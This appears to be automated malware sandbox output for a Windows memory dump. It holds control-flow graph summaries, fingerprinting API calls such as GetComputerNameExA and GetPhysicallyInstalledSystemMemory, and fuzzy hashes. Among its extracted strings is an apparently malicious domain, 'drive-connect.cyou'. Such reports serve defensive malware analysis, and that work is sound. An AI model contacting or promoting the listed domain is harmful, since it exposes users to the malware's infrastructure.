                                                                                                                                                                                                                                              control_flow_graph 432 40a960-40a989 433 40a990-40a9e5 432->433 433->433 434 40a9e7-40aadf 433->434 435 40aae0-40ab1b 434->435 435->435 436 40ab1d-40ab39 435->436 437 40ab40-40ab69 436->437 437->437 438 40ab6b-40ab7a call 40b6a0 437->438 440 40ab7f-40ab86 438->440 441 40ae29-40ae32 440->441 442 40ab8c-40ab98 440->442 443 40aba0-40abb2 442->443 443->443 444 40abb4-40abb9 443->444 445 40abc0-40abcc 444->445 446 40abd3-40abe4 445->446 447 40abce-40abd1 445->447 448 40ae20-40ae26 call 439b60 446->448 449 40abea-40abff 446->449 447->445 447->446 448->441 451 40ac00-40ac41 449->451 451->451 453 40ac43-40ac50 451->453 454 40ac52-40ac58 453->454 455 40ac84-40ac88 453->455 458 40ac67-40ac6b 454->458 456 40ae1e 455->456 457 40ac8e-40acb6 455->457 456->448 460 40acc0-40acf4 457->460 458->456 459 40ac71-40ac78 458->459 461 40ac7a-40ac7c 459->461 462 40ac7e 459->462 460->460 463 40acf6-40acff 460->463 461->462 464 40ac60-40ac65 462->464 465 40ac80-40ac82 462->465 466 40ad01-40ad0b 463->466 467 40ad34-40ad36 463->467 464->455 464->458 465->464 469 40ad17-40ad1b 466->469 467->456 468 40ad3c-40ad52 467->468 470 40ad60-40adb2 468->470 469->456 471 40ad21-40ad28 469->471 470->470 472 40adb4-40adbe 470->472 473 40ad2a-40ad2c 471->473 474 40ad2e 471->474 475 40adc0-40adc8 472->475 476 40adf4-40adf8 472->476 473->474 477 40ad10-40ad15 474->477 478 40ad30-40ad32 474->478 479 40add7-40addb 475->479 480 40adfe-40ae1c call 40a6d0 476->480 477->467 477->469 478->477 479->456 481 40addd-40ade4 479->481 480->448 483 40ade6-40ade8 481->483 484 40adea-40adec 481->484 483->484 486 40add0-40add5 484->486 487 40adee-40adf2 484->487 486->479 488 40adfa-40adfc 486->488 487->486 488->456 488->480
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                                                                                                                                                                                              • API String ID: 0-490458541
                                                                                                                                                                                                                                              • Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                                                              • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 489 40ce55-40ce62 490 40ce70-40ce9b 489->490 490->490 491 40ce9d-40ced5 call 408720 call 436f90 490->491 496 40cee0-40cf06 491->496 496->496 497 40cf08-40cf6b 496->497 498 40cf70-40cfa7 497->498 498->498 499 40cfa9-40cfba 498->499 500 40cfc0-40cfcb 499->500 501 40d03d 499->501 502 40cfd0-40cfd9 500->502 503 40d041-40d049 501->503 502->502 504 40cfdb 502->504 505 40d05b-40d068 503->505 506 40d04b-40d04f 503->506 504->503 508 40d06a-40d071 505->508 509 40d08b-40d093 505->509 507 40d050-40d059 506->507 507->505 507->507 510 40d080-40d089 508->510 511 40d095-40d096 509->511 512 40d0ab-40d1c6 509->512 510->509 510->510 513 40d0a0-40d0a9 511->513 514 40d1d0-40d215 512->514 513->512 513->513 514->514 515 40d217-40d239 514->515 516 40d240-40d250 515->516 516->516 517 40d252-40d27f call 40b6a0 516->517 519 40d284-40d29e 517->519
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 3384FC726411342223D904AF30EFEBBC$F^$I@$N~ :$VgfW$drive-connect.cyou$z@(
                                                                                                                                                                                                                                              • API String ID: 0-1303459773
                                                                                                                                                                                                                                              • Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                                                              • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 520 4087f0-4087fe call 43afd0 523 408804-40880b call 434680 520->523 524 408979-40897b ExitProcess 520->524 527 408811-408849 GetCurrentProcessId GetCurrentThreadId 523->527 528 408974 call 43b400 523->528 530 408851-4088d6 GetForegroundWindow 527->530 531 40884b-40884f 527->531 528->524 532 408950-408968 call 409cc0 530->532 533 4088d8-40894e 530->533 531->530 532->528 536 40896a call 40cdf0 532->536 533->532 538 40896f call 40b670 536->538 538->528
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                                                              • String ID: YO9W
                                                                                                                                                                                                                                              • API String ID: 3118123366-386669604
                                                                                                                                                                                                                                              • Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                                                                                                                                                                              • Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 600 40c36e-40c559 601 40c560-40c58e 600->601 601->601 602 40c590-40c7ab 601->602 604 40c7b0-40c7de 602->604 604->604 605 40c7e0-40c7e8 604->605 606 40c7ec-40c7ff 605->606
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                                                                                                                                                                                              • API String ID: 0-4192230409
                                                                                                                                                                                                                                              • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                                                              • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 607 42c6d7-42c6ff 608 42c700-42c74f 607->608 608->608 609 42c751-42c761 608->609 610 42c763-42c76f 609->610 611 42c77b-42c787 609->611 612 42c770-42c779 610->612 613 42c7a1-42c803 call 43ce00 call 41dc20 611->613 614 42c789-42c78b 611->614 612->611 612->612 622 42c810-42c82a 613->622 615 42c790-42c79d 614->615 615->615 617 42c79f 615->617 617->613 622->622 623 42c82c-42c85f 622->623 624 42c860-42c886 623->624 624->624 625 42c888-42c892 624->625 626 42c894-42c89b 625->626 627 42c8ab-42c8b3 625->627 628 42c8a0-42c8a9 626->628 629 42c8b5-42c8b6 627->629 630 42c8cb-42c8d8 627->630 628->627 628->628 631 42c8c0-42c8c9 629->631 632 42c8da-42c8e1 630->632 633 42c8fb-42c946 630->633 631->630 631->631 634 42c8f0-42c8f9 632->634 635 42c950-42c978 633->635 634->633 634->634 635->635 636 42c97a-42c984 635->636 637 42c986-42c98f 636->637 638 42c99b-42c9a5 636->638 639 42c990-42c999 637->639 640 42c9a7-42c9ab 638->640 641 42c9bb-42ca35 638->641 639->638 639->639 642 42c9b0-42c9b9 640->642 643 42cad8-42cb04 641->643 642->641 642->642 644 42cb10-42cb60 643->644 644->644 645 42cb62-42cb72 644->645 646 42cb74-42cb76 645->646 647 42cb8b-42cb97 645->647 648 42cb80-42cb89 646->648 649 42cbb1-42cbf7 call 43ce00 GetPhysicallyInstalledSystemMemory call 41dc20 647->649 650 42cb99-42cb9b 647->650 648->647 648->648 656 42cbfc-42cc13 649->656 651 42cba0-42cbad 650->651 651->651 653 42cbaf 651->653 653->649 657 42cc20-42cc3a 656->657 657->657 658 42cc3c-42cc6f 657->658 659 42cc70-42cc96 658->659 659->659 660 42cc98-42cca2 659->660 661 42cca4-42ccab 660->661 662 42ccbb-42ccc3 660->662 663 42ccb0-42ccb9 661->663 664 42ccc5-42ccc6 662->664 665 42ccdb-42cce8 662->665 663->662 663->663 666 42ccd0-42ccd9 664->666 667 42ccea-42ccf1 665->667 668 42cd0b-42cd56 665->668 666->665 666->666 669 42cd00-42cd09 667->669 670 42cd60-42cd88 668->670 669->668 669->669 670->670 671 42cd8a-42cd98 670->671 672 42cd9a-42cda1 671->672 673 42cdbb-42cdc5 671->673 674 42cdb0-42cdb9 672->674 675 42ca40-42cad5 673->675 676 42cdcb 673->676 674->673 674->674 675->643 677 42cdd0-42cdd9 676->677 677->677 678 42cddb 677->678 678->675
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: '$iJ
                                                                                                                                                                                                                                              • API String ID: 0-30662343
                                                                                                                                                                                                                                              • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                                                                                                                                                                              • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 679 42bfd3-42c0e8 call 43ce00 682 42c0ed-42c13a GetComputerNameExA 679->682 683 42c140-42c167 682->683 683->683 684 42c169-42c173 683->684 685 42c175-42c17f 684->685 686 42c18d 684->686 687 42c180-42c189 685->687 688 42c18f-42c19c 686->688 687->687 689 42c18b 687->689 690 42c1bb-42c20f GetComputerNameExA 688->690 691 42c19e-42c1a5 688->691 689->688 692 42c210-42c252 690->692 693 42c1b0-42c1b9 691->693 692->692 694 42c254-42c25e 692->694 693->690 693->693 695 42c260-42c267 694->695 696 42c27b-42c288 694->696 697 42c270-42c279 695->697 698 42c28a-42c291 696->698 699 42c2ab-42c2ff 696->699 697->696 697->697 700 42c2a0-42c2a9 698->700 702 42c300-42c324 699->702 700->699 700->700 702->702 703 42c326-42c330 702->703 704 42c332-42c339 703->704 705 42c34b-42c358 703->705 708 42c340-42c349 704->708 706 42c35a-42c361 705->706 707 42c37b-42c3d6 call 43ce00 705->707 709 42c370-42c379 706->709 713 42c3e0-42c3fa 707->713 708->705 708->708 709->707 709->709 713->713 714 42c3fc-42c406 713->714 715 42c41b-42c42f 714->715 716 42c408-42c40f 714->716 718 42c572-42c5b1 715->718 719 42c435-42c43c 715->719 717 42c410-42c419 716->717 717->715 717->717 721 42c5c0-42c5e7 718->721 720 42c440-42c44a 719->720 723 42c460-42c466 720->723 724 42c44c-42c451 720->724 721->721 722 42c5e9-42c5fb 721->722 727 42c61b-42c61e call 430520 722->727 728 42c5fd-42c604 722->728 725 42c490-42c49e 723->725 726 42c468-42c46b 723->726 729 42c510-42c516 724->729 732 42c4a4-42c4a7 725->732 733 42c52a-42c533 725->733 726->725 730 42c46d-42c483 726->730 737 42c623-42c643 727->737 731 42c610-42c619 728->731 735 42c518-42c51e 729->735 730->729 731->727 731->731 732->733 736 42c4ad-42c50e 732->736 739 42c535-42c537 733->739 740 42c539-42c53c 733->740 735->718 738 42c520-42c522 735->738 736->729 738->720 741 42c528 738->741 739->735 742 42c56e-42c570 740->742 743 42c53e-42c56c 740->743 741->718 742->729 743->729
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                                              • String ID: x
                                                                                                                                                                                                                                              • API String ID: 3545744682-2363233923
                                                                                                                                                                                                                                              • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                                                                                                                                                                              • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 788 426170-42618f 789 426190-4261bf 788->789 789->789 790 4261c1-4261cd 789->790 791 426214-426221 790->791 792 4261cf-4261d7 790->792 794 426230-426283 791->794 793 4261e0-4261e7 792->793 796 4261f0-4261f6 793->796 797 4261e9-4261ec 793->797 794->794 795 426285-426289 794->795 798 426310-426312 795->798 799 42628f-4262af call 439b40 795->799 796->791 801 4261f8-42620c call 43b480 796->801 797->793 800 4261ee 797->800 803 4264ef-4264f8 798->803 807 4262b0-4262df 799->807 800->791 806 426211 801->806 806->791 807->807 808 4262e1-4262ed 807->808 809 426336-42633a 808->809 810 4262ef-4262f7 808->810 811 426340-426349 809->811 812 4264e6-4264ec call 439b60 809->812 813 426300-426307 810->813 814 426350-426365 811->814 812->803 816 426317-42631d 813->816 817 426309-42630c 813->817 814->814 818 426367-426369 814->818 816->809 821 42631f-42632e call 43b480 816->821 817->813 820 42630e 817->820 822 426370-42637d call 407ff0 818->822 823 42636b 818->823 820->809 826 426333 821->826 828 426390-42639a 822->828 823->822 826->809 829 426380-42638e 828->829 830 42639c-42639f 828->830 829->828 831 4263b3-4263b7 829->831 832 4263a0-4263af 830->832 834 4264dd-4264e3 call 408000 831->834 835 4263bd-4263c8 831->835 832->832 833 4263b1 832->833 833->829 834->812 837 4263ca-4263d1 835->837 838 42641b-426467 call 407ff0 call 408e90 835->838 841 4263ec-4263f0 837->841 851 426470-4264b8 838->851 842 4263f2-4263fb 841->842 843 4263e0 841->843 846 426410-426414 842->846 847 4263fd-426400 842->847 845 4263e1-4263ea 843->845 845->838 845->841 846->845 849 426416-426419 846->849 847->845 849->845 851->851 852 4264ba-4264d9 call 408ff0 call 408000 851->852 852->834
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                                                                                                                                                                                              • API String ID: 2994545307-1799417857
                                                                                                                                                                                                                                              • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                              • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                              • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @CDE
                                                                                                                                                                                                                                              • API String ID: 2994545307-1513065382
                                                                                                                                                                                                                                              • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                              • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: tuv
                                                                                                                                                                                                                                              • API String ID: 0-2475268160
                                                                                                                                                                                                                                              • Opcode ID: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                              • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                              • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: \U^_
                                                                                                                                                                                                                                              • API String ID: 0-352632802
                                                                                                                                                                                                                                              • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                              • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                                                              • Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00434C09
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                              • String ID: t
                                                                                                                                                                                                                                              • API String ID: 95929093-2238339752
                                                                                                                                                                                                                                              • Opcode ID: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                                                                                                                                                                              • Instruction ID: 08a8b9a0e37a212ebea7de5d04b95149eac63241ee44ff142c93878423301f38
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53F0FF34808298CFDB10DF68D4943EEBBF16F66304F1880ACC08497382D37A9A84CB12
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043B720
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043B740
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                                              • Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
